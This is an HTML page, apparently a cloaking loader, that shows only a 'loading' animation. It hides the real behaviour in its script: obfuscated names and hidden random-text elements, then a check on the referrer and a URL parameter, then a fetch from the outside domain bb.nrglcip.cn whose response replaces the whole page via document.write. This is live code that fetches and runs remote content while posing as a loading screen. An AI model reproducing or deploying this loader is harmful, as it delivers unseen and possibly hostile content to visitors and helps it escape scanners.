<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .xrBA95eAih5 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .xrBA95eAih5 .XTuuVsKK2D0 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .xrBA95eAih5 .content {
            line-height: 50px;
            text-align: center
        }

        .xrBA95eAih5 .img {
            width: 100%
        }

        .xrBA95eAih5 .CsO5bDX2 {
            text-align: center
        }

        .xrBA95eAih5 .CsO5bDX2 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .xrBA95eAih5 .CsO5bDX2 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .xrBA95eAih5 .CsO5bDX2 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .xrBA95eAih5 .CsO5bDX2 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .xrBA95eAih5 .CsO5bDX2 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .xrBA95eAih5 .CsO5bDX2 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .xrBA95eAih5 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function bmi8BWhokUo(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var iYdRAsG = bmi8BWhokUo('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ iYdRAsG +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ iYdRAsG +".html?a=share";
		}
		
        S66cGTmMD=url+"#"+new Date().getTime();
        S66cGTmMD && function() {
            $.get(S66cGTmMD, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >M4lQOEPMBVSEuUTlouf3dI</h1>
<p  style='display:none'>U0ZXvABPUSJDrgeEzpyLrjwzjaDPmgL0GmDeTFqq4p9YImYsR2BGk9TeGHrQiEf11tVYN</p>
<ul style='display:none' >RMJj0xkfCoUMLPocbQd9nREjIv75GnnC1MN6zRp67cmpDqc9apeMLky3qoNUvGBr</ul>
<li style='display:none' >auFW2A9rI4G9O2OMK</li><div class="xrBA95eAih5">
    <div class="XTuuVsKK2D0">
        <div class="CsO5bDX2">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>DH6MQa87nePkCUpspdCUFr1qy</a>
<span style='display:none'>u9IwtwLheRGu8IidW16dia8IC6C8OZCABOQD3ekeBoSJe2Gj5lLJeKJFS0S8udjKhoNRaa0ZYJ2dPzC8owYq4kx8gxtMXVWo7</span>
<div style='display:none'>zVU8bvPPq715YKABGddfu8xckXlcFDHAZsphB</div>
<img  src='' style='display:none'>
<ul style='display:none' >G3hn9UBG2bFZ51i73IuG42E26TgoUxcDuP5LMLH6PdjoT</ul></body>
</html>